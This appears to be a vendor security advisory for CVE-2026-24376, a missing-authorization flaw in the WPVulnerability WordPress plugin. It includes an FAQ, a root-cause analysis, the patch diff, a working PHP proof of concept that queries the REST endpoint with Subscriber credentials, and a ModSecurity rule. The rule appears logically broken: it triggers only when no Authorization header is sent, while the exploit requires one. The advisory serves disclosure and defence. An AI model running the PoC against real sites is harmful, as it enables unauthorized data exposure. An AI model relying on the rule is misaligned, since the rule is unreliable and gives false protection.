What is CVE-2026-24376?

CVE-2026-24376 is a medium-severity vulnerability in the WPVulnerability plugin for WordPress, affecting versions up to and including 4.2.1. It is caused by a missing authorization check that allows authenticated users to access sensitive vulnerability data.

How does this vulnerability work?

The vulnerability arises from a function in the plugin that fails to check user capabilities after authenticating with an Application Password. This allows any authenticated user, even those with low privileges, to access the REST API endpoint and retrieve sensitive information.

Who is affected by this vulnerability?

Any WordPress site using the WPVulnerability plugin version 4.2.1 or earlier is at risk. This includes sites where users have Subscriber-level access or higher, as they can exploit the vulnerability to gain unauthorized access to vulnerability data.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WPVulnerability plugin installed on your WordPress site. If it is version 4.2.1 or earlier, your site is affected by this vulnerability.

How can I fix this vulnerability?

To mitigate this vulnerability, update the WPVulnerability plugin to version 4.2.1.1 or later. This patched version includes a capability check that restricts access to sensitive data based on user roles.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 categorizes this vulnerability as medium severity. This means it poses a moderate risk, allowing authenticated users to access sensitive information, which could lead to further attacks if exploited.

What is the proof of concept for this vulnerability?

The proof of concept illustrates how an attacker can exploit the vulnerability using a valid WordPress account with Subscriber privileges. By sending an authenticated request to the REST API endpoint, the attacker can retrieve sensitive vulnerability information.

What kind of data can be exposed through this vulnerability?

Exploitation of this vulnerability allows attackers to access detailed reports about vulnerabilities in the WordPress core, themes, and plugins. This information can be used to target further attacks against the site.

Is there any risk of privilege escalation?

The vulnerability does not directly enable privilege escalation or remote code execution. However, it does expose sensitive information that could facilitate further attacks, potentially leading to more severe security issues.

What changes were made in the patched version?

The patched version of the plugin introduces a capability check after user authentication. It ensures that only users with appropriate permissions, such as Administrators, can access the REST API endpoints that provide vulnerability data.

How can I ensure ongoing security against such vulnerabilities?

To maintain security, regularly update all plugins and themes, monitor for vulnerabilities, and implement strong user role management. Additionally, consider using security plugins that provide further protection against unauthorized access.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-24376: WPVulnerability <= 4.2.1 – Missing Authorization (wpvulnerability)

CVE ID CVE-2026-24376

Plugin wpvulnerability

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 4.2.1

Patched Version 4.2.1.1

Disclosed March 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24376:
The WPVulnerability plugin for WordPress, versions up to and including 4.2.1, contains a missing authorization vulnerability in its custom REST API permission callback. This flaw allows any authenticated user, including those with only Subscriber privileges, to access sensitive vulnerability data. The CVSS score of 4.3 reflects a medium-severity impact.

Atomic Edge research identifies the root cause in the `wpvulnerability_api_permission_check` function within `/wpvulnerability/wpvulnerability-api.php`. The vulnerable function, defined at line 457, only validated user authentication via an Application Password. It lacked any capability check. The function returned `true` upon successful authentication, granting API access regardless of the user’s role or permissions. This missing authorization check constitutes CWE-862.

The exploitation method targets the plugin’s REST API endpoint. An attacker with a valid WordPress account, even with Subscriber-level access, can send an authenticated HTTP GET request to the WPVulnerability API endpoint. The request must include a valid Application Password for the low-privileged user in the `Authorization` header. A successful request returns vulnerability data that should be restricted to administrators. The specific endpoint path is `/wp-json/wpvulnerability/v1/` followed by the relevant data route, such as `core` or `themes`.

The patch modifies the `wpvulnerability_api_permission_check` function. After authenticating the user via `wp_authenticate_application_password`, the patched code now performs a capability check. It calls `user_can()` on the authenticated user object. For multisite installations, it requires the `manage_network_options` capability. For single-site installations, it requires `manage_options`. These capabilities are typically held only by Administrator users. The patch also adds a direct ABSPATH check at the top of the API file for additional security.

Successful exploitation leads to unauthorized information disclosure. Attackers can retrieve detailed vulnerability reports about the WordPress core, installed themes, and plugins. This data could aid in further targeted attacks against the site by revealing unpatched software weaknesses. The impact is confined to data exposure and does not directly enable privilege escalation or remote code execution.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wpvulnerability/wpvulnerability-api.php
+++ b/wpvulnerability/wpvulnerability-api.php
@@ -7,6 +7,8 @@
  * @since 3.3.0
  */

+defined( 'ABSPATH' ) || die( 'No script kiddies please!' );
+
 /**
  * Handle the core vulnerabilities REST API request.
  *
@@ -437,7 +439,8 @@
 /**
  * Custom permission check for the WPVulnerability REST API.
  *
- * This function checks if the request is authenticated using an Application Password.
+ * This function checks if the request is authenticated using an Application Password
+ * and verifies that the user has the required capabilities to access vulnerability data.
  *
  * @since 3.3.0
  *
@@ -457,8 +460,17 @@
 			list( $user, $password ) = explode( ':', $auth_string );

 			// Authenticate the user using the application password.
-			if ( wp_authenticate_application_password( null, $user, $password ) instanceof WP_User ) {
-				return true;
+			$authenticated_user = wp_authenticate_application_password( null, $user, $password );
+
+			if ( $authenticated_user instanceof WP_User ) {
+				// Check if user has the required capability.
+				// For multisite, require manage_network_options.
+				// For single site, require manage_options.
+				if ( is_multisite() ) {
+					return user_can( $authenticated_user, 'manage_network_options' );
+				}
+
+				return user_can( $authenticated_user, 'manage_options' );
 			}
 		}
 	}
--- a/wpvulnerability/wpvulnerability.php
+++ b/wpvulnerability/wpvulnerability.php
@@ -5,7 +5,7 @@
  * Description: Receive information about possible vulnerabilities in your WordPress from WordPress Vulnerability Database API.
  * Requires at least: 4.7
  * Requires PHP: 5.6
- * Version: 4.2.1
+ * Version: 4.2.1.1
  * Author: Javier Casares
  * Author URI: https://www.javiercasares.com/
  * License: GPL-2.0-or-later
@@ -23,7 +23,7 @@
 /**
  * Set some constants that I can change in future versions.
  */
-define( 'WPVULNERABILITY_PLUGIN_VERSION', '4.2.1' );
+define( 'WPVULNERABILITY_PLUGIN_VERSION', '4.2.1.1' );
 define( 'WPVULNERABILITY_API_HOST', 'https://www.wpvulnerability.net/' );

 /**

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-24376
SecRule REQUEST_URI "@rx ^/wp-json/wpvulnerability/v1/" 
  "id:100024376,phase:2,deny,status:403,chain,msg:'CVE-2026-24376: Unauthorized WPVulnerability REST API access attempt',severity:'CRITICAL',tag:'CVE-2026-24376',tag:'WPVulnerability'"
  SecRule &REQUEST_HEADERS:Authorization "@eq 0" "chain"
    SecRule REMOTE_USER "!@rx ^(administrator|admin)" "t:lowercase,setvar:'tx.cve_2026_24376_score=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24376 - WPVulnerability <= 4.2.1 - Missing Authorization

<?php

// Configuration
$target_url = 'https://example.com/wp-json/wpvulnerability/v1/core';
$username = 'subscriber_user';
$application_password = 'xxxx xxxx xxxx xxxx xxxx';

// Construct the Authorization header
$auth_string = base64_encode($username . ':' . $application_password);
$headers = [
    'Authorization: Basic ' . $auth_string,
    'Content-Type: application/json',
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // Disable for testing only

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results
if ($http_code === 200 && !empty($response)) {
    echo "[+] Exploit successful. Received vulnerability data.n";
    echo "[+] HTTP Status: $http_coden";
    $data = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        echo "[+] Data sample: " . print_r($data, true) . "n";
    } else {
        echo "[+] Raw response: $responsen";
    }
} else {
    echo "[-] Exploit failed or endpoint not accessible.n";
    echo "[-] HTTP Status: $http_coden";
    echo "[-] Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-24376?
Overview of the vulnerability
CVE-2026-24376 is a medium-severity vulnerability in the WPVulnerability plugin for WordPress, affecting versions up to and including 4.2.1. It is caused by a missing authorization check that allows authenticated users to access sensitive vulnerability data.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a function in the plugin that fails to check user capabilities after authenticating with an Application Password. This allows any authenticated user, even those with low privileges, to access the REST API endpoint and retrieve sensitive information.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WPVulnerability plugin version 4.2.1 or earlier is at risk. This includes sites where users have Subscriber-level access or higher, as they can exploit the vulnerability to gain unauthorized access to vulnerability data.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the WPVulnerability plugin installed on your WordPress site. If it is version 4.2.1 or earlier, your site is affected by this vulnerability.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the WPVulnerability plugin to version 4.2.1.1 or later. This patched version includes a capability check that restricts access to sensitive data based on user roles.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
The CVSS score of 4.3 categorizes this vulnerability as medium severity. This means it poses a moderate risk, allowing authenticated users to access sensitive information, which could lead to further attacks if exploited.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept illustrates how an attacker can exploit the vulnerability using a valid WordPress account with Subscriber privileges. By sending an authenticated request to the REST API endpoint, the attacker can retrieve sensitive vulnerability information.
What kind of data can be exposed through this vulnerability?
Potential information disclosure
Exploitation of this vulnerability allows attackers to access detailed reports about vulnerabilities in the WordPress core, themes, and plugins. This information can be used to target further attacks against the site.
Is there any risk of privilege escalation?
Assessing escalation potential
The vulnerability does not directly enable privilege escalation or remote code execution. However, it does expose sensitive information that could facilitate further attacks, potentially leading to more severe security issues.
What changes were made in the patched version?
Details of the fix
The patched version of the plugin introduces a capability check after user authentication. It ensures that only users with appropriate permissions, such as Administrators, can access the REST API endpoints that provide vulnerability data.
How can I ensure ongoing security against such vulnerabilities?
Best practices for WordPress security
To maintain security, regularly update all plugins and themes, monitor for vulnerabilities, and implement strong user role management. Additionally, consider using security plugins that provide further protection against unauthorized access.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations